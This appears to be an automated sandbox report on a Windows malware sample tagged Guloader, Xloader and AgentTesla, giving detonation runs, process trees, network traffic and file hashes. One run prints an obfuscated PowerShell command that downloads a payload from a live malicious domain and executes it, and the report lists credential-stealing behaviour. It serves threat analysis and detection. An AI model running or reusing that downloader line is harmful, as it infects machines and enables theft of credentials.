Analysis Overview
SHA256: 7ca0acdc3e8b24c2034b2205dbfdf744c903cae7c88b1d09b529991168c05dca
Threat Level: Known bad
The file 7ca0acdc3e8b24c2034b2205dbfdf744c903cae7c88b1d09b529991168c05dca was found to be: Known bad.
Malicious Activity Summary
Guloader, Cloudeye
Xloader family
Agenttesla family
Guloader family
AgentTesla
Xloader
Xloader payload
AgentTesla payload
Blocklisted process makes network request
Checks computer location settings
Reads user/profile data of web browsers
Reads WinSCP keys stored on the system
Loads dropped DLL
Reads user/profile data of local email clients
Reads data files stored by FTP clients
Unsecured Credentials: Credentials In Files
Accesses Microsoft Outlook profiles
Suspicious use of SetThreadContext
Hide Artifacts: Ignore Process Interrupts
Unsigned PE
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
Office loads VBA resources, possible macro or embedded object present
Gathers system information
Suspicious behavior: EnumeratesProcesses
outlook_office_path
Scheduled Task/Job: Scheduled Task
Suspicious behavior: AddClipboardFormatListener
Checks processor information in registry
outlook_win_path
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: MapViewOfSection
Enumerates system info in registry
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported: 2024-11-21 20:24
Signatures
Unsigned PE
Analysis: behavioral20
Detonation Overview
Submitted: 2024-11-21 20:24
Reported: 2024-11-21 20:26
Platform: win10v2004-20241007-en
Max time kernel: 148s
Max time network: 151s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4180 wrote to memory of 3924 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4180 wrote to memory of 3924 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4180 wrote to memory of 3924 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3924 -ip 3924
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3924 -s 612
Network
Files
Analysis: behavioral25
Detonation Overview
Submitted: 2024-11-21 20:24
Reported: 2024-11-21 20:26
Platform: win10v2004-20241007-en
Max time kernel: 93s
Max time network: 143s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Hide Artifacts: Ignore Process Interrupts
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1116 wrote to memory of 4008 | N/A | C:\Users\Admin\AppData\Local\Temp\New order 003848848575 02162022.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1116 wrote to memory of 4008 | N/A | C:\Users\Admin\AppData\Local\Temp\New order 003848848575 02162022.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\New order 003848848575 02162022.exe
"C:\Users\Admin\AppData\Local\Temp\New order 003848848575 02162022.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell $ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|IEX;do {$ping = test-connection -comp google.com -count 1 -Quiet} until($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|I`E`X;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing', [Microsoft.VisualBasic.CallType]::Method,'http' + '://spa2o.com/H99.jpg')|I`E`X
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.194.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | spa2o.com | udp |
| HR | 185.58.73.32:80 | spa2o.com | tcp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
Files
memory/1116-0-0x00007FFDF20F3000-0x00007FFDF20F5000-memory.dmp
memory/1116-1-0x00000000005B0000-0x00000000005B8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5ymwjjgs.h5c.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
Analysis: behavioral27
Detonation Overview
Submitted: 2024-11-21 20:24
Reported: 2024-11-21 20:26
Platform: win10v2004-20241007-en
Max time kernel: 147s
Max time network: 154s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\PO_#YBIC3892900183902328_Evaluated Copy.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\PO_#YBIC3892900183902328_Evaluated Copy.exe
"C:\Users\Admin\AppData\Local\Temp\PO_#YBIC3892900183902328_Evaluated Copy.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sync-shop.com | udp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 8.8.8.8:53 | 225.219.220.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| FR | 23.200.86.235:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | 26.58.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.86.200.23.in-addr.arpa | udp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 8.8.8.8:53 | 17.14.97.104.in-addr.arpa | udp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| FR | 23.200.86.235:80 | r11.o.lencr.org | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
Files
Analysis: behavioral1
Detonation Overview
Submitted: 2024-11-21 20:24
Reported: 2024-11-21 20:26
Platform: win7-20241010-en
Max time kernel: 61s
Max time network: 19s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Processes
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\IoC\00496083.xls
Network
Files
Analysis: behavioral5
Detonation Overview
Submitted: 2024-11-21 20:24
Reported: 2024-11-21 20:26
Platform: win7-20240903-en
Max time kernel: 130s
Max time network: 124s
Command Line
Signatures
AgentTesla
Agenttesla family
AgentTesla payload
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 268 set thread context of 2744 | N/A | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe
"C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe"
C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe
"C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe"
Network
Files
Analysis: behavioral31
Detonation Overview
Submitted: 2024-11-21 20:24
Reported: 2024-11-21 20:26
Platform: win10v2004-20241007-en
Max time kernel: 133s
Max time network: 148s
Command Line
Signatures
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Processes
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\IoC\XSG8996380.xls"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| FR | 52.109.68.129:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 97.32.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.68.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
| MD5 | 0eb5b1247d963e4d110d0c614b463f6c |
| SHA1 | ba07bcc5e1e4ebdcf361b1311211c21231a3b0c8 |
| SHA256 | d54c96240493dbcaa2ffc9a4586ceac048adce2aee33001f791b6bfa02f46b1a |
| SHA512 | 92b5fc0a6864564acdd6cbdd6c33dfaa92081a8060ccd421491b408345223b9b2e8204d028bda679875e76a5241d4d47cf1a584c75bbb38c30e64d3f13d18fdf |
Analysis: behavioral2
Detonation Overview
Submitted: 2024-11-21 20:24
Reported: 2024-11-21 20:26
Platform: win10v2004-20241007-en
Max time kernel: 133s
Max time network: 147s
Command Line
Signatures
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Processes
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\IoC\00496083.xls"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.32.109.52.in-addr.arpa | udp |
| FR | 52.109.68.129:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 28.242.123.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.68.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
| MD5 | 685657fb7094a8866ed6f5e2af57c914 |
| SHA1 | cd68e6a7b50e91b41863b1cbb4227510d8899bbe |
| SHA256 | ca42f861122e74fd6e5aba72eb91a303f1b3b21bb9251917a0e574fc22a051d0 |
| SHA512 | af36cfdbe692c588d7c362ac3c4b40fc7f6d6d18b5392a16b45e9330c4d09575e9343e4509f74ee234fb5065fe29c7515d5721d5db6fbcff33ded971ae2cb962 |
Analysis: behavioral18
Detonation Overview
Submitted: 2024-11-21 20:24
Reported: 2024-11-21 20:26
Platform: win10v2004-20241007-en
Max time kernel: 149s
Max time network: 153s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4544 wrote to memory of 1420 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4544 wrote to memory of 1420 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4544 wrote to memory of 1420 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\Math.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\Math.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1420 -ip 1420
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1420 -s 608
Network
Files
Analysis: behavioral12
Detonation Overview
Submitted: 2024-11-21 20:24
Reported: 2024-11-21 20:26
Platform: win10v2004-20241007-en
Max time kernel: 149s
Max time network: 153s
Command Line
Signatures
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Processes
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\IoC\I055170_06975755.xls"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| FR | 52.109.68.129:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 97.32.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.68.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.242.123.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.10.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.208.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.80.50.20.in-addr.arpa | udp |
Files
memory/2256-1-0x00007FF8DAE2D000-0x00007FF8DAE2E000-memory.dmp
memory/2256-0-0x00007FF89AE10000-0x00007FF89AE20000-memory.dmp
